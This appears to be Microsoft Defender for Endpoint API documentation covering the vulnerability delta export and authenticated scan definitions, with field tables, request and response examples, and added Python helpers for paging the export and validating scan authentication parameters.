DeviceId | String | Unique identifier for the device in the service. | 9eaf3a8b5962e0e6b1af9ec756664a9b823df2d1
DeviceName | String | Fully qualified domain name (FQDN) of the device. | johnlaptop.europe.contoso.com
DiskPaths | Array[string] | Disk evidence that the product is installed on the device. | ["C:\Program Files (x86)\Microsoft\Silverlight\Application\silverlight.exe"]
EventTimestamp | String | The time this delta event was found. | 2021-01-11T11:06:08.291Z
ExploitabilityLevel | String | The exploitability level of this vulnerability (NoExploit, ExploitIsPublic, ExploitIsVerified, ExploitIsInKit). | ExploitIsInKit
FirstSeenTimestamp | String | First time the CVE of this product was seen on the device. | 2020-11-03 10:13:34.8476880
Id | String | Unique identifier for the record. | 123ABG55_573AG&mnp!
LastSeenTimestamp | String | Last time the CVE was seen on the device. | 2020-11-03 10:13:34.8476880
OSPlatform | String | Platform of the operating system running on the device; specific operating systems with variations within the same family, such as Windows 10 and Windows 11. See Microsoft Defender Vulnerability Management supported operating systems and platforms for details. | Windows10 and Windows 11
RbacGroupName | String | The role-based access control (RBAC) group. If this device isn't assigned to any RBAC group, the value will be "Unassigned." If the organization doesn't contain any RBAC groups, the value will be "None." | Servers
RecommendationReference | String | A reference to the recommendation ID related to this software. | va--microsoft--silverlight
RecommendedSecurityUpdate | String | Name or description of the security update provided by the software vendor to address the vulnerability. | April 2020 Security Updates
RecommendedSecurityUpdateId | String | Identifier of the applicable security updates or identifier for the corresponding guidance or knowledge base (KB) articles. | 4550961
RegistryPaths | Array[string] | Registry evidence that the product is installed in the device. | ["HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\Curren Chrome"]
SoftwareName | String | Name of the software product. | Chrome
SoftwareVendor | String | Name of the software vendor. | Google
SoftwareVersion | String | Version number of the software product. | 81.0.4044.138
Status | String | New (a new vulnerability was introduced on a device); Fixed (the vulnerability no longer exists on the device, which means it was remediated); Updated (a vulnerability on a device has changed; the possible changes are CVSS score, exploitability level, severity level, DiskPaths, RegistryPaths, and RecommendedSecurityUpdate). | Fixed
VulnerabilitySeverityLevel | String | Severity level that is assigned to the security vulnerability. It's based on the CVSS score. | Medium

Clarifications
If the software was updated from version 1.0 to version 2.0, and both versions are exposed to CVE-A, you'll receive two separate
events:

1. Fixed: CVE-A on version 1.0 was fixed.
2. New: CVE-A on version 2.0 was added.

If a specific vulnerability (for example, CVE-A) was first seen at a specific time (for example, January 10) on software with version 1.0,
and a few days later that software was updated to version 2.0, which is also exposed to the same CVE-A, you'll receive these two
separate events:

1. Fixed: CVE-A, FirstSeenTimestamp January 10, version 1.0.
2. New: CVE-A, FirstSeenTimestamp January 10, version 2.0.
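The pairing described in these clarifications matters when the delta export is used for KPIs: a plain count of Fixed events overstates remediation whenever an upgrade carries the same CVE across versions. The following is an added example, not Microsoft's code; it builds the first delta request URL, pages through @odata.nextLink using a caller-supplied fetch function, and computes both raw and net counts. The device IDs, the CVE-A/B/C identifiers and the `$skiptoken` value are constructed placeholders, and `fake_fetch` stands in for the HTTP layer.

```python
"""KPIs from Defender for Endpoint delta-export records (added example)."""
from collections import Counter
from datetime import datetime, timedelta, timezone
from urllib.parse import urlencode

BASE_URL = "https://api.securitycenter.microsoft.com/api/machines/SoftwareVulnerabilityChangesByMachine"
MAX_SINCE_DAYS = 14  # documented ceiling for the sinceTime parameter


def request_url(now: datetime, lookback: timedelta, page_size: int) -> str:
    """Build the first delta request, refusing a sinceTime older than 14 days.

    urlencode percent-encodes the colons, matching the documented request
    example (sinceTime=2021-05-19T18%3A35%3A49.924Z). pageSize is used rather
    than $top because $top suppresses @odata.nextLink.
    """
    if lookback > timedelta(days=MAX_SINCE_DAYS):
        raise ValueError("sinceTime may be at most 14 days in the past")
    since = (now - lookback).strftime("%Y-%m-%dT%H:%M:%S.000Z")
    return BASE_URL + "?" + urlencode({"pageSize": page_size, "sinceTime": since})


def collect_all(first_url: str, fetch) -> list:
    """Follow @odata.nextLink until it is absent and return every record.

    'fetch' maps a URL to the parsed JSON body; the caller supplies auth and
    stays within the documented rate limits (30 calls/minute, 1000 calls/hour).
    """
    records, url, seen = [], first_url, set()
    while url:
        if url in seen:  # a looping link would otherwise burn the rate limit
            raise RuntimeError("@odata.nextLink cycle detected")
        seen.add(url)
        body = fetch(url)
        records.extend(body.get("value", []))
        url = body.get("@odata.nextLink")
    return records


def delta_kpis(records) -> dict:
    """Per-status counts plus a net view that pairs version carry-overs.

    Only rows with a cveId are counted: the documented response also contains
    rows with cveId == null, which track software removal rather than a
    vulnerability. When software is upgraded and both versions carry the same
    CVE, the API emits Fixed for the old version and New for the new one (see
    Clarifications); the net view treats such a pair as neither fixed nor new.
    """
    cve_rows = [r for r in records if r.get("cveId")]
    by_status = Counter(r["status"] for r in cve_rows)

    def key(r):  # same device, same product, same CVE: version is ignored
        return (r["deviceId"], r["softwareName"], r["cveId"])

    fixed = {key(r) for r in cve_rows if r["status"] == "Fixed"}
    new = {key(r) for r in cve_rows if r["status"] == "New"}
    return {
        "events": dict(by_status),
        "net_fixed": len(fixed - new),
        "net_new": len(new - fixed),
        "version_carried_over": len(fixed & new),
    }


# ---- constructed sample (hypothetical devices; CVE-A/B/C are placeholders) --
_TS = "2021-01-11T11:06:08.291Z"
SAMPLE_DELTA = [
    {"deviceId": "dev-1", "softwareName": "chrome", "softwareVersion": "1.0", "cveId": "CVE-A", "status": "Fixed", "eventTimestamp": _TS},
    {"deviceId": "dev-1", "softwareName": "chrome", "softwareVersion": "2.0", "cveId": "CVE-A", "status": "New", "eventTimestamp": _TS},
    {"deviceId": "dev-1", "softwareName": "firefox", "softwareVersion": "83.0.0.0", "cveId": "CVE-B", "status": "Fixed", "eventTimestamp": _TS},
    {"deviceId": "dev-2", "softwareName": "chrome", "softwareVersion": "2.0", "cveId": "CVE-C", "status": "New", "eventTimestamp": _TS},
    {"deviceId": "dev-2", "softwareName": "onedrive", "softwareVersion": "20.64.329.3", "cveId": None, "status": "Fixed", "eventTimestamp": _TS},
]

NOW = datetime(2021, 1, 12, 0, 0, tzinfo=timezone.utc)
FIRST_URL = request_url(NOW, timedelta(days=2), page_size=3)
NEXT_URL = BASE_URL + "?pageSize=3&$skiptoken=PLACEHOLDER_TOKEN"
FAKE_PAGES = {  # two pages: three rows, then the remaining two with no nextLink
    FIRST_URL: {"value": SAMPLE_DELTA[:3], "@odata.nextLink": NEXT_URL},
    NEXT_URL: {"value": SAMPLE_DELTA[3:]},
}


def fake_fetch(url: str) -> dict:
    """Offline stand-in for an authenticated GET against the API."""
    return FAKE_PAGES[url]


if __name__ == "__main__":
    rows = collect_all(FIRST_URL, fake_fetch)
    print(FIRST_URL)
    print(delta_kpis(rows))  # {'events': {'Fixed': 2, 'New': 2}, 'net_fixed': 1, 'net_new': 1, 'version_carried_over': 1}
```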

3.6 Examples

3.6.1 Request example

HTTP

GET https://api.securitycenter.microsoft.com/api/machines/SoftwareVulnerabilityChangesByMachine?pageSize=5&sinceTime=2021-05-19T18%3A35%3A49.924Z

3.6.2 Response example

JSON

{
"@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Collection(microsoft.windowsDefenderATP.api.DeltaAssetVulnerability)",
"value": [
{
"id": "008198251234544f7dfa715e278d4cec0c16c171_chrome_87.0.4280.88__",
"deviceId": "008198251234544f7dfa715e278b4cec0c19c171",
"rbacGroupName": "hhh",
"deviceName": "ComputerPII_1c8fee370690ca24b6a0d3f34d193b0424943a8b8.DomainPII_0dc1aee0fa366d175e514bd91a9e7a5b2b07ee8e.corp.contoso.com",
"osPlatform": "Windows10",
"osVersion": "10.0.19042.685",
"osArchitecture": "x64",
"softwareVendor": "google",
"softwareName": "chrome",
"softwareVersion": "87.0.4280.88",
"cveId": null,
"vulnerabilitySeverityLevel": null,
"recommendedSecurityUpdate": null,
"recommendedSecurityUpdateId": null,
"recommendedSecurityUpdateUrl": null,
"diskPaths": [
"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe"
],
"registryPaths": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Google Chrome"
],
"lastSeenTimestamp": "2021-01-04 00:29:42",
"firstSeenTimestamp": "2020-11-06 03:12:44",
"exploitabilityLevel": "NoExploit",
"recommendationReference": "va-_-google-_-chrome",
"status": "Fixed",
"eventTimestamp": "2021-01-11T11:06:08.291Z"
},
{
"id": "00e59c61234533860738ecf488eec8abf296e41e_onedrive_20.64.329.3__",
"deviceId": "00e56c91234533860738ecf488eec8abf296e41e",
"rbacGroupName": "hhh",
"deviceName": "ComputerPII_82c13a8ad8cf3dbaf7bf34fada9fa3aebc124116.DomainPII_21eeb80d086e79dbfa178eadfa25e8de9acfa346.corp.contoso.com",
"osPlatform": "Windows10",
"osVersion": "10.0.18363.1256",
"osArchitecture": "x64",
"softwareVendor": "microsoft",
"softwareName": "onedrive",
"softwareVersion": "20.64.329.3",
"cveId": null,
"vulnerabilitySeverityLevel": null,
"recommendedSecurityUpdate": null,
"recommendedSecurityUpdateId": null,
"recommendedSecurityUpdateUrl": null,
"diskPaths": [],
"registryPaths": [
"HKEY_USERS\\S-1-5-21-2127521184-1604012920-1887927527-24918864\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\OneDriveSetup.exe"
],
"lastSeenTimestamp": "2020-12-11 19:49:48",
"firstSeenTimestamp": "2020-12-07 18:25:47",
"exploitabilityLevel": "NoExploit",
"recommendationReference": "va-_-microsoft-_-onedrive",
"status": "Fixed",
"eventTimestamp": "2021-01-11T11:06:08.291Z"
},
{
"id": "01aa8c73095bb12345918663f3f94ce322107d24_firefox_83.0.0.0_CVE-2020-26971_",
"deviceId": "01aa8c73065bb12345918693f3f94ce322107d24",
"rbacGroupName": "hhh",
"deviceName": "ComputerPII_42684eb981bea2d670027e7ad2caafd3f2b381a3.DomainPII_21eed80b086e76dbfa178eabfa25e8de9acfa346.corp.contoso.com",
"osPlatform": "Windows10",
"osVersion": "10.0.19042.685",
"osArchitecture": "x64",
"softwareVendor": "mozilla",
"softwareName": "firefox",
"softwareVersion": "83.0.0.0",
"cveId": "CVE-2020-26971",
"vulnerabilitySeverityLevel": "High",
"recommendedSecurityUpdate": "193220",
"recommendedSecurityUpdateId": null,
"recommendedSecurityUpdateUrl": null,
"diskPaths": [
"C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe"
],
"registryPaths": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Mozilla Firefox 83.0 (x86 en-US)"
],
"lastSeenTimestamp": "2021-01-05 17:04:30",
"firstSeenTimestamp": "2020-05-06 12:42:19",
"exploitabilityLevel": "NoExploit",
"recommendationReference": "va-_-mozilla-_-firefox",
"status": "Fixed",
"eventTimestamp": "2021-01-11T11:06:08.291Z"
},
{
"id": "026f0fcb12345fbd2decd1a339702131422d362e_project_16.0.13701.20000__",
"deviceId": "029f0fcb13245fbd2decd1a336702131422d392e",
"rbacGroupName": "hhh",
"deviceName": "ComputerPII_a5706750acba75f15d69cd17f4a7fcd268d6422c.DomainPII_f290e982685f7e8eee168b4332e0ae5d2a069cd6.corp.contoso.com",
"osPlatform": "Windows10",
"osVersion": "10.0.19042.685",
"osArchitecture": "x64",
"softwareVendor": "microsoft",
"softwareName": "project",
"softwareVersion": "16.0.13701.20000",
"cveId": null,
"vulnerabilitySeverityLevel": null,
"recommendedSecurityUpdate": null,
"recommendedSecurityUpdateId": null,
"recommendedSecurityUpdateUrl": null,
"diskPaths": [],
"registryPaths": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\ProjectProRetail - en-us"
],
"lastSeenTimestamp": "2021-01-03 23:38:03",
"firstSeenTimestamp": "2019-08-01 22:56:12",
"exploitabilityLevel": "NoExploit",
"recommendationReference": "va-_-microsoft-_-project",
"status": "Fixed",
"eventTimestamp": "2021-01-11T11:06:08.291Z"
},
{
"id": "038df381234510b357ac19d0113ef622e4e212b3_chrome_81.0.4044.138_CVE-2020-16011_",
"deviceId": "038df381234510d357ac19b0113ef922e4e212b3",
"rbacGroupName": "hhh",
"deviceName":
"ComputerPII_365f5c0bb7202c163937dad3d017969b2d760eb4.DomainPII_29596a43a2ef2bbfa00f6a16c0cb1d108bc63e32.DomainPII_3c5fefd2
e6fda2f36257359404f6c1092aa6d4b8.net",
"osPlatform": "Windows10" "Windows11",
"osVersion": "10.0.18363.1256",
"osArchitecture": "x64",
"softwareVendor": "google",
"softwareName": "chrome",
"softwareVersion": "81.0.4044.138",
"cveId": "CVE-2020-16011",
"vulnerabilitySeverityLevel": "High",
"recommendedSecurityUpdate": "ADV 200002",
"recommendedSecurityUpdateId": null,
"recommendedSecurityUpdateUrl": null,
"diskPaths": [
"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe"
],
"registryPaths": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{C4EBFDFD-0C55-3E5F-A919-
E3C54949024A}"
],
"lastSeenTimestamp": "2020-12-10 22:45:41",
"firstSeenTimestamp": "2020-07-26 02:13:43",
"exploitabilityLevel": "NoExploit",
"recommendationReference": "va-_-google-_-chrome",
"status": "Fixed",
"eventTimestamp": "2021-01-11T11:06:08.291Z"
}
],
"@odata.nextLink": "https://wpatdadi-eus-stg.cloudapp.net/api/machines/SoftwareVulnerabilitiesTimeline?sincetime=2021-
01-
11&pagesize=5&$skiptoken=eyJFeHBvcnREZWZpbml0aW9uIjp7IlRpbWVQYXRoIjoiMjAyMS0wMS0xMS8xMTAxLyJ9LCJFeHBvcnRGaWxlSW5kZXgiOjAsIk
xpbmVTdG9wcGVkQXQiOjV9"
}

See also
Export assessment methods and properties per device
Export secure configuration assessment per device
Export software inventory assessment per device

Other related

Microsoft Defender Vulnerability Management
Vulnerabilities in your organization

Tip

Do you want to learn more? Engage with the Microsoft Security community in our Tech Community: Microsoft Defender for Endpoint Tech Community.


Authenticated scan methods and properties
Article • 02/22/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Vulnerability Management
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Want to experience Microsoft Defender Vulnerability Management? Learn more about how you can sign up to the Microsoft Defender Vulnerability Management public preview trial.

Important

Some information in this article relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use the server closest to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Methods

| Method | Description |
| --- | --- |
| Get all scan definitions | List all scan definitions. |
| Add, delete, or update a scan definition | Add, delete, or update a scan definition. |
| Get all scan agents | List all scan agents. |
| Get scan agent by ID | Retrieves the details for a specified agent by its ID. |
| Get scan history by definition | List scan definition history. |
| Get scan history by session | List scan history for a session. |

Learn more about Windows authenticated scan and Network authenticated scans.

Properties

| Property | Data type | Description |
| --- | --- | --- |
| id | String | Scan ID. |
| scanType | Enum | The type of scan. Possible values are: Windows, Network. |
| scanName | String | Name of the scan. |
| isActive | Boolean | Whether the scan is actively running. |
| orgId | String | Related organization ID. |
| intervalInHours | Int | The interval at which the scan runs. |
| createdBy | String | Unique identity of the user that created the scan. |
| targetType | String | The target type in the target field. Possible types are IP Address or Hostname. Default value is IP Address. |
| target | String | A comma-separated list of targets to scan, either IP addresses or hostnames. |
| scanAuthenticationParams | Object | An object representing the authentication parameters; see Authentication parameters object properties for the expected fields. This property is mandatory when creating a new scan and is optional when updating a scan. |
| scannerAgent | Object | An object representing the scanner agent; contains the machine ID of the scanning device. |

Authentication parameters object properties

| Property | Data type | Description |
| --- | --- | --- |
| @odata.type | Enum | The scan type authentication parameters. Possible values are: #microsoft.windowsDefenderATP.api.SnmpAuthParams for the Network scan type, and #microsoft.windowsDefenderATP.api.WindowsAuthParams for the Windows scan type. |
| type | Enum | The authentication method. Possible values vary based on the @odata.type property. If @odata.type is SnmpAuthParams, possible values are CommunityString, NoAuthNoPriv, AuthNoPriv, AuthPriv. If @odata.type is WindowsAuthParams, possible values are Kerberos or Negotiate. |
| KeyVaultUrl (Optional) | String | An optional property that specifies from which KeyVault the scanner should retrieve credentials. If a KeyVault is specified, there's no need to specify a username and password. |
| KeyVaultSecretName (Optional) | String | An optional property that specifies the KeyVault secret name from which the scanner should retrieve credentials. If a KeyVault is specified, there's no need to specify a username and password. |
| Domain (Optional) | String | Domain name when using WindowsAuthParams. |
| Username (Optional) | String | Username when using WindowsAuthParams, or the username when choosing SnmpAuthParams with any type other than CommunityString. |
| IsGMSAUser (Optional) | Boolean | Must be set to true when choosing WindowsAuthParams. |
| CommunityString (Optional) | String | Community string to use when choosing SnmpAuthParams with CommunityString. |
| AuthProtocol (Optional) | String | Auth protocol to use with SnmpAuthParams and AuthNoPriv or AuthPriv. Possible values are MD5, SHA1. |
| AuthPassword (Optional) | String | Auth password to use with SnmpAuthParams and AuthNoPriv or AuthPriv. |
| PrivProtocol (Optional) | String | Priv protocol to use with SnmpAuthParams and AuthPriv. Possible values are DES, 3DES, AES. |
| PrivPassword (Optional) | String | Priv password to use with SnmpAuthParams and AuthPriv. |

Get scan definitions
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Vulnerability Management
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Want to experience Microsoft Defender Vulnerability Management? Find out how to sign up for a free trial.

Important

Some information in this article relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use the server closest to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Retrieves a list of all scan definitions.

Limitations
1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions, see Use Microsoft Defender for Endpoint APIs.

| Permission type | Permission | Permission display name |
| --- | --- | --- |
| Application | Machine.Read.All | Read all scan information. |
| Delegated (work or school account) | Machine.Read.All | Read all scan information. |

Note

When obtaining a token using user credentials:

To view data the user needs to have at least the following role permission: 'ViewData' or 'TvmViewData' (see Create and manage roles for more information).

HTTP request
HTTP

GET /api/DeviceAuthenticatedScanDefinitions

Request headers

| Name | Type | Description |
| --- | --- | --- |
| Authorization | String | Bearer {token}. Required. |

Request body
Empty

Response
If successful, this method returns 200 - OK response code with a list of authenticated
scan definitions.

Example

Request example
Here is an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanDefinitions

Response example
Here is an example of the response.

JSON

{
  "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#DeviceAuthenticatedScanDefinitions",
  "value": [
    {
      "id": "60c4vv57-asdf-3454-a456-2e45t9d79ec9d",
      "scanType": "Windows",
      "scanName": "Test Windows scan",
      "isActive": true,
      "target": "127.0.0.1",
      "orgId": "47d21a0c-cccd-45d3-bffa-a93dbc0bfcaa",
      "intervalInHours": 1,
      "createdBy": "test@contoso.com",
      "targetType": "Ip",
      "scanAuthenticationParams": {
        "@odata.type": "#microsoft.windowsDefenderATP.api.WindowsAuthParams",
        "type": "Kerberos",
        "username": "username",
        "domain": "password",
        "isGmsaUser": true
      },
      "scannerAgent": {
        "id": "47d41a0c-xxx-46d3-bbea-93dbc0bfcaa_1bc268a79eedf14c4b90f77",
        "machineId": "eb663asadf345dfg4bc268a79eedf14c4b90f77",
        "machineName": "DESKTOP-TEST",
        "lastSeen": "2021-12-19T20:29:04.8242449Z",
        "AssignedApplicationId": "9E0FA0EB-0A51-4357-9C87-C21BFBE07571",
        "ScannerSoftwareVersion": "7.1.1",
        "LastCommandExecutionTimestamp": "2021-12-19T20:29:04.8242449Z",
        "mdeClientVersion": "10.8295.22621.1195"
      },
      "latestScan": {
        "status": "Fail",
        "failureReason": null,
        "executionDateTime": "2021-12-19T20:06:55.2295854Z"
      }
    },
    {
      "id": "60c4aa57-ioi3-1290-7ff6-09fr14792a92",
      "scanType": "Network",
      "scanName": "Network-test-scan",
      "isActive": true,
      "target": "127.0.0.1",
      "orgId": "asdf781a0c-792d-46d3-bbea-a93dbc0bfcaa",
      "intervalInHours": 1,
      "createdBy": "test@contoso.com",
      "targetType": "Ip",
      "scanAuthenticationParams": {
        "@odata.type": "#microsoft.windowsDefenderATP.api.SnmpAuthParams",
        "type": "AuthPriv",
        "username": "username",
        "authProtocol": "authProtocol",
        "authPassword": "authPassword",
        "privProtocol": "privProtocol",
        "privPassword": "privPassword",
        "communityString": "community-string"
      },
      "scannerAgent": {
        "id": "4asdff0c-3344-46d3-bxxe-a9334rtgfcaa_eb6df89dfdf9032f61eedf14c4b90f77",
        "machineId": "eb663a27676kjhj61bc268a79eedf14c4t78u7",
        "machineName": "DESKTOP-Test",
        "lastSeen": "2022-12-21T14:34:19.5698988Z",
        "AssignedApplicationId": "9E0FA0EB-0A51-4357-9C87-C21BFBE07571",
        "ScannerSoftwareVersion": "7.1.1",
        "LastCommandExecutionTimestamp": "2022-12-21T14:34:19.5698988Z",
        "mdeClientVersion": "10.8295.22621.1195"
      },
      "latestScan": {
        "status": "Fail",
        "failureReason": null,
        "executionDateTime": "2022-12-21T14:35:55.6702703Z"
      }
    }
  ]
}


Add, update, or delete a scan definition
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender Vulnerability Management
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Want to experience Microsoft Defender Vulnerability Management? Learn more about how you can sign up to the Microsoft Defender Vulnerability Management public preview trial.

Important

Some information in this article relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use the server closest to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
API to add, update, or delete an authenticated scan.

Limitations
Rate limitations for this API are 100 calls per minute and 1,500 calls per hour.

You can only post on machines that were last seen within your configured retention period.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions, see Use Defender for Endpoint APIs.

| Permission type | Permission | Permission display name |
| --- | --- | --- |
| Application | Machine.ReadWrite.All | Read and write all scan information. |
| Delegated (work or school account) | Machine.Read.Write | Read and write all scan information. |

Note

When obtaining a token using user credentials:

To view data the user needs to have at least the following role permission: ViewData or TvmViewData (see Create and manage roles for more information).
To edit data the user needs to have at least the following role permission: ManageSecurity (see Create and manage roles for more information).

HTTP request
HTTP

POST https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanDefinitions

Request headers

| Name | Type | Description |
| --- | --- | --- |
| Authorization | String | Bearer {token}. Required. |
| Content-Type | string | application/json. Required. |

Request body
In the request body, supply a JSON object with the following parameters:

| Parameter | Type | Description |
| --- | --- | --- |
| scanType | Enum | The type of scan. Possible values are: "Windows", "Network". Required. |
| scanName | String | Name of the scan. Required. |
| isActive | Boolean | Whether the scan is actively running. Required. |
| target | String | A comma-separated list of targets to scan, either IP addresses or hostnames. Required. |
| intervalInHours | Int | The interval at which the scan runs. Required. |
| targetType | String | The target type in the target field. Possible types are "IP Address" or "Hostname". Default value is IP Address. Required. |
| scannerAgent | Object | An object containing the machine ID of the scanning device. Required. |
| scanAuthenticationParams | Object | An object representing the authentication parameters; see Authentication parameters object properties for the expected fields. This property is mandatory when creating a new scan and is optional when updating a scan. |
Response
If successful, this method returns 200 - Ok response code and the new or updated scan
definition in the response body.
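The rules in the Properties and Authentication parameters tables above, and in this request body table, as an added example (not Microsoft's code) that checks a scan definition locally before it is POSTed or PATCHed. Function and variable names are the editor's; the field names and allowed values come from the page, while the warnings for inline credentials instead of KeyVault and for the clear-text, MD5 and DES options are the editor's additions. Keys are matched case-insensitively because the tables write KeyVaultUrl and IsGMSAUser while the JSON examples write isGmsaUser.

```python
WINDOWS_AUTH = "#microsoft.windowsDefenderATP.api.WindowsAuthParams"
SNMP_AUTH = "#microsoft.windowsDefenderATP.api.SnmpAuthParams"

# Allowed "type" values per @odata.type, from the authentication parameters table.
AUTH_TYPES = {
    WINDOWS_AUTH: {"Kerberos", "Negotiate"},
    SNMP_AUTH: {"CommunityString", "NoAuthNoPriv", "AuthNoPriv", "AuthPriv"},
}
AUTH_PROTOCOLS = {"MD5", "SHA1"}
PRIV_PROTOCOLS = {"DES", "3DES", "AES"}
# scanType -> the @odata.type its authentication object must carry.
SCAN_TYPE_AUTH = {"Windows": WINDOWS_AUTH, "Network": SNMP_AUTH}


def _lower_keys(obj):
    """Compare on lower-cased keys: the table writes KeyVaultUrl and IsGMSAUser,
    the JSON examples write isGmsaUser."""
    return {k.lower(): v for k, v in obj.items()}


def validate_auth_params(params):
    """Return (errors, warnings): table-rule violations and accepted-but-weak choices."""
    errors, warnings = [], []
    p = _lower_keys(params)
    odata_type, auth_type = p.get("@odata.type"), p.get("type")
    if odata_type not in AUTH_TYPES:
        return [f"unknown @odata.type {odata_type!r}"], warnings
    if auth_type not in AUTH_TYPES[odata_type]:
        return [f"type {auth_type!r} is not valid for {odata_type}"], warnings
    # With a KeyVault the scanner fetches the secret itself, so no username,
    # password or community string has to travel in the request body.
    uses_keyvault = bool(p.get("keyvaulturl"))
    if uses_keyvault and not p.get("keyvaultsecretname"):
        errors.append("KeyVaultSecretName is required with KeyVaultUrl")  # assumption
    if not uses_keyvault:
        warnings.append("credentials inline in the definition; prefer KeyVaultUrl")
    if odata_type == WINDOWS_AUTH:
        if p.get("isgmsauser") is not True:
            errors.append("IsGMSAUser must be true for WindowsAuthParams")
        if not uses_keyvault and not p.get("username"):
            errors.append("Username is required without a KeyVault")
        return errors, warnings
    # SNMP: what is required grows with the security level of the chosen type.
    if auth_type == "CommunityString":
        warnings.append("CommunityString (SNMPv1/v2c) is sent in clear text")
        if not uses_keyvault and not p.get("communitystring"):
            errors.append("CommunityString value is required")
        return errors, warnings
    if not uses_keyvault and not p.get("username"):
        errors.append("Username is required for SNMPv3 types without a KeyVault")
    if auth_type == "NoAuthNoPriv":
        warnings.append("NoAuthNoPriv gives neither authentication nor encryption")
        return errors, warnings
    # AuthNoPriv and AuthPriv both need an auth protocol and password.
    if p.get("authprotocol") not in AUTH_PROTOCOLS:
        errors.append("AuthProtocol must be MD5 or SHA1 for AuthNoPriv/AuthPriv")
    elif p["authprotocol"] == "MD5":
        warnings.append("MD5 is a weak auth protocol; prefer SHA1")
    if not uses_keyvault and not p.get("authpassword"):
        errors.append("AuthPassword is required without a KeyVault")
    if auth_type == "AuthPriv":
        if p.get("privprotocol") not in PRIV_PROTOCOLS:
            errors.append("PrivProtocol must be DES, 3DES or AES for AuthPriv")
        elif p["privprotocol"] != "AES":
            warnings.append(f"{p['privprotocol']} is a weak priv protocol; prefer AES")
        if not uses_keyvault and not p.get("privpassword"):
            errors.append("PrivPassword is required without a KeyVault")
    return errors, warnings


def build_scan_definition(scan_type, scan_name, targets, machine_id,
                          auth_params=None, interval_hours=24,
                          target_type="Ip", is_active=True, update=False):
    """Body for POST (create) or PATCH (update); auth is mandatory only on create."""
    if scan_type not in SCAN_TYPE_AUTH:
        raise ValueError(f"scanType must be Windows or Network, not {scan_type!r}")
    if auth_params is None:
        if not update:
            raise ValueError("scanAuthenticationParams is required when creating a scan")
    else:
        if _lower_keys(auth_params).get("@odata.type") != SCAN_TYPE_AUTH[scan_type]:
            raise ValueError(f"{scan_type} scans require {SCAN_TYPE_AUTH[scan_type]}")
        errors, _ = validate_auth_params(auth_params)
        if errors:
            raise ValueError("; ".join(errors))
    body = {
        "scanName": scan_name,
        "isActive": is_active,
        "target": ",".join(targets),  # comma-separated IPs or hostnames
        "intervalInHours": interval_hours,
        "targetType": target_type,    # "Ip", as in the page's examples
    }
    if not update:  # the PATCH example on the page omits these two fields
        body["scanType"] = scan_type
        body["scannerAgent"] = {"machineId": machine_id}
    if auth_params is not None:
        body["scanAuthenticationParams"] = auth_params
    return body
```

Running validate_auth_params over the SnmpAuthParams object in the Get scan definitions response above reports its placeholder authProtocol and privProtocol values as invalid, which is the kind of slip this catches before the API does.
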
Example request to add a new scan
Here's an example of a request that adds a new scan.

HTTP

POST https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanDefinitions

JSON

{
"scanType": "Windows",
"scanName": "Test Windows scan",
"isActive": true,
"target": "127.0.0.1",
"intervalInHours": 1,
"targetType": "Ip",
"scannerAgent": {
"machineId": "eb663a27ae9d032f61bc268a79eedf14c4b90f77",
},
"scanAuthenticationParams": {
"@odata.type": "#microsoft.windowsDefenderATP.api.WindowsAuthParams",
"type": "Kerberos",
"username": "username",
"domain": "password",
"isGmsaUser": true
}
}

Example response
Here's an example of the response.

JSON

{
  "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#DeviceAuthenticatedScanDefinitions/$entity",
  "id": "289224fb-1686-472c-9751-5555960854ca",
  "scanType": "Windows",
  "scanName": "Test Windows scan",
  "isActive": true,
  "target": "127.0.0.1",
  "orgId": "0335a792-18d2-424b-aeed-559567054570",
  "intervalInHours": 1,
  "createdBy": "username@test.com",
  "targetType": "Ip",
  "scanAuthenticationParams": null,
  "scannerAgent": {
